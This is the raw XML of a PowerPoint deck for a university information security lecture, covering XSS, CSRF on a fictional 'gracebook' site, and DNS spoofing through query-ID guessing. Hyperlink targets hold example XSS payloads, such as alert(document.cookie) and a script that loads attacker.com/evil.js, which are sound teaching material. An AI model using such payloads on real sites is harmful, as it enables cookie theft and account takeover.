                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{39C1F2F2-B00A-DAC3-032F-A1E044F151D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0F2FB1B-1B14-A199-E296-CE1061B8CFFF}"/>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109922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A76F-2522-D4D4-7A23-7AB4CDC2D75B}"/>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3" name="Footer Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{003D5606-1561-7E77-EBE6-82A62E9305A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69C075A-DBDB-267F-12AE-05679053DAAD}"/>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245252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09A1-8944-3DFF-37C2-4ECE76FC3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4C4523F-C8D9-D418-B9CC-2B371824A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6D0A236-747D-18A0-BCDB-33E73DE00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4226C-2C24-C327-C102-4F1C9400FEF0}"/>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6" name="Footer Placeholder 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{343D941B-FCD4-1E42-FD0A-8661E0B140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2B1F5E9-5EFC-435C-7D02-BF70B8EC5CBB}"/>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271003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D5AE-C2F9-4B42-ECC4-05F2E08C1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B410B47-A667-D442-3C30-EED8002B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B3B9207-E76D-6FDA-5119-BD5F6CE2D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2E31B-8981-A251-7ED3-3BE6BF94BB56}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{D636600D-5A95-4C63-A28A-0B6EE5510901}" type="datetimeFigureOut">
              <a:rPr lang="en-PK" smtClean="0"/>
              <a:t>27/11/2024</a:t>
            </a:fld>
            <a:endParaRPr lang="en-PK"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Footer Placeholder 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8A05991D-B389-C60B-CEF0-9610BE8ADD3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D81C04F-C6FC-6A97-4BC2-FC1963B59647}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{0222F7EE-90FB-43E7-A8EE-F27FAD0BA7BF}" type="slidenum">
              <a:rPr lang="en-PK" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-PK"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="147309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24CFF-7A28-C682-CB39-BA3C6F91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9405A08-D74F-70EC-4767-B7B94BD9B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8118145-2273-98F7-C69B-00EC2E142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6600D-5A95-4C63-A28A-0B6EE5510901}" type="datetimeFigureOut">
              <a:rPr lang="en-PK" smtClean="0"/>
              <a:t>27/11/2024</a:t>
            </a:fld>
            <a:endParaRPr lang="en-PK"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Footer Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CB16568F-1F6B-445F-9021-47E16CDBE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C9A835C-804F-E8DD-F2C3-4E0651F30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2F7EE-90FB-43E7-A8EE-F27FAD0BA7BF}" type="slidenum">
              <a:rPr lang="en-PK" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-PK"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="281592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5AEA9-11EF-57B7-1812-A8E4DBA0F9F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BE9782E-C28E-9724-94D8-EEB8FEB0D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BDA4C5-FCB5-BD14-5A39-C1C29A712E4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381780-83DF-4B8E-B7A2-BB3685708DD6}" type="datetimeFigureOut">
              <a:rPr lang="en-PK" smtClean="0"/>
              <a:t>27/11/2024</a:t>
            </a:fld>
            <a:endParaRPr lang="en-PK"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Footer Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7B1F7C34-4794-FF38-DCA2-D09A4A09887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2E3147-2959-9BDA-56E0-9B07392B77B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5153EA-CEFB-45D2-AF2C-A5F51DEB2142}" type="slidenum">
              <a:rPr lang="en-PK" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-PK"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="375166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P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CCF811B-D484-48E1-A434-12652924B793}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>11/27/2024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FAST-NUCES</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64824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hyperlink" Target="http://www.gracebook.com/" TargetMode="External"/><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01.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.gracebook.com/" TargetMode="External"/><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02.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.gracebook.com/"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hyperlink" Target="http://www.gracebook.com/form.ph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www.gracebook.com/share.php"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www.gracebook.com/share.php"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gracebook.com/share.php?text=SPAM%20COMMENT"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www.gracebook.com/"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www.gracebook.com/"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gracebook.com/"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1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17.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18.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jp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jpg"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image36.png"/></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jp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jpg"/><Relationship Id="rId9"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jp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3.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jp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4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jp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4.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jp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4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jp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5.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jp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7.png"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image43.png"/><Relationship Id="rId26" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image53.png"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image50.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6.png"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image42.png"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image52.jpg"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide26.xml"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image40.jpg"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image45.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35.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39.png"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image48.png"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image55.png"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image34.png"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image44.png"/><Relationship Id="rId31" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image58.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image51.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7.png"/><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image54.png"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image5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image" Target="../media/image59.jpg"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image41.png"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image45.png"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide31.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44.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image30.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47.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image" Target="../media/image59.jpg"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image41.png"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image45.png"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide32.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44.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image30.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47.png"/></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18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image63.png"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image59.jpg"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image41.png"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image45.png"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image62.png"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide33.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44.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image30.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18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image49.png"/><Relationship Id="rId26" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image64.jpg"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image59.jpg"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image54.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image41.png"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image45.png"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image48.png"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image58.png"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide34.xml"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image63.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0.png"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image62.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jp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47.png"/><Relationship Id="rId22"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2.jpg"/><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9.jpg"/><Relationship Id="rId7"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40.jpg"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide5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0.jpg"/><Relationship Id="rId7"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59.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0.jpg"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image6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59.jpg"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide6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6.png"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image59.jp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74.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image30.png"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image7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77.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide62.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6.png"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image40.jp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74.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image30.png"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image64.jpg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image73.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image59.jpg"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image34.png"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image7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example.site/page.html?default=CS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www.example.site/page.html?default=%3cscript%3ealert(document.cookie)%3c/script"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afebank.com/welcome.php?name=Jo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attacker.co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afebank.com/welcome.php?name" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://safebank.com/welcome.php?name=doEvi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attacker.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safebank.com/welcome.php?name" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://safebank.com/welcome.php?name=doEvil()" TargetMode="External"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide7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0.jpg"/><Relationship Id="rId7"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59.jpg"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide7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0.jpg"/><Relationship Id="rId7"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59.jpg"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide7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0.jpg"/><Relationship Id="rId7"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59.jpg"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide74.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6.png"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image59.jp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74.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image30.png"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image7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77.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide7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6.png"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image59.jp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74.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image30.png"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image64.jpg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image73.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image40.jpg"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image34.png"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image77.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide76.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://example.net/welcome.php#name%3DJoe"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vil.co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8.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://evil.com/" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image86.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5.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image80.png"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image84.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image79.png"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image83.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide82.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://attacker.com/evil.js"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attacker.com/evil.js"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attacker.com/evil.js"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attacker.com/evil.js"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attacker.com/evil.j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attacker.com/evil.js%26quot%3B%26gt%3B%26lt%3B/script%26gt%3B"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www.functions-online.com/htmlentities.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hyperlink" Target="http://www.gracebook.com/share.php"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hyperlink" Target="http://www.gracebook.com/"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hyperlink" Target="http://www.gracebook.com/"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96.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.gracebook.com/share.php"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hyperlink" Target="http://www.gracebook.com/"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98.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hyperlink" Target="http://www.gracebook.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99.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.gracebook.com/" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image88.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image92.jp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4467" y="1384462"/>
            <a:ext cx="8210006" cy="1122416"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="68580" tIns="34290" rIns="68580" bIns="3429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defTabSz="685800"/>
            <a:r>
              <a:rPr lang="en-US" sz="5775" dirty="0">
                <a:latin typeface="Calibri Light" panose="020F0302020204030204"/>
              </a:rPr>
              <a:t>CS 3002 Information Security</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4050" dirty="0">
              <a:latin typeface="Calibri Light" panose="020F0302020204030204"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" defTabSz="685800"/>
            <a:r>
              <a:rPr lang="en-US" sz="3450" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Calibri Light" panose="020F0302020204030204"/>
              </a:rPr>
              <a:t>                                                                   Fall 2024</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Subtitle 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5756007" y="3670167"/>
            <a:ext cx="4506640" cy="2091268"/>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defTabSz="685800">
              <a:spcBef>
                <a:spcPts val="750"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1500" b="1" dirty="0">
              <a:solidFill>
                <a:prstClr val="black"/>
              </a:solidFill>
              <a:latin typeface="Calibri" panose="020F0502020204030204"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="97631" indent="0" algn="ctr" defTabSz="685800">
              <a:spcBef>
                <a:spcPts val="750"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>Week # 15 – Lecture# 40, 41, 42</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="97631" indent="0" algn="ctr" defTabSz="685800">
              <a:spcBef>
                <a:spcPts val="750"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>26, 27 and 28 November</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" b="1" baseline="30000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>2024 </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" b="1" dirty="0">
              <a:solidFill>
                <a:prstClr val="black"/>
              </a:solidFill>
              <a:latin typeface="Calibri" panose="020F0502020204030204"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="97631" indent="0" algn="ctr" defTabSz="685800">
              <a:spcBef>
                <a:spcPts val="750"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>Dr. Aqsa Aslam</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="Picture 1"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2058607" y="2185789"/>
            <a:ext cx="3964752" cy="1126114"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="8" name="Group 7"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2650849" y="3420934"/>
            <a:ext cx="2214949" cy="2340500"/>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175248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 Spoofing (5)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="66563" name="Rectangle 3" descr="Rectangle: Click to edit Master text styles&#10;Second level&#10;Third level&#10;Fourth level&#10;Fifth level"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="518473" y="1219199"/>
            <a:ext cx="11547835" cy="5285295"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>3. How can Trudy supply a fake DNS reply that appears to be real?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Techniques:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="0" lang="en-PK" altLang="en-PK" sz="22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Guessing or Predicting Query IDs</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-PK" altLang="en-PK" sz="22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 IDs are 16-bit numbers, meaning there are 65,536 possibilities.</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IDs are predictable (e.g., sequential), Trudy can anticipate future IDs.</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IDs are random, Trudy can flood the resolver with many guesses.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="0" lang="en-PK" altLang="en-PK" sz="22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Sending the Fake Reply</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-PK" altLang="en-PK" sz="22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Trudy sends a forged response with:</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fake IP address she wants the resolver to cache.</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correct query ID, domain name, and query type to make it appear valid.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="0" lang="en-PK" altLang="en-PK" sz="22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Exploiting Timing</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-PK" altLang="en-PK" sz="22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Trudy sends her fake response immediately after the query is sent.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="0" lang="en-PK" altLang="en-PK"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her response arrives first, the resolver accepts it and ignores the real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lvl="1"/>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Good chance of succeeding!</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824813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345337" y="4433485"/>
            <a:ext cx="1491827" cy="768779"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="16933" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="4233" algn="ctr">
              <a:spcBef>
                <a:spcPts val="133"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="1867" b="1" spc="-7" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>share.php</a:t>
            </a:r>
            <a:endParaRPr sz="1867">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="16933" marR="6773" algn="ctr">
              <a:spcBef>
                <a:spcPts val="53"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="1467" spc="-7" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>valid</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1467" spc="-107" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1467" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>session </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1467" spc="-860" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1467" spc="-7" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>cookie?</a:t>
            </a:r>
            <a:endParaRPr sz="1467">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
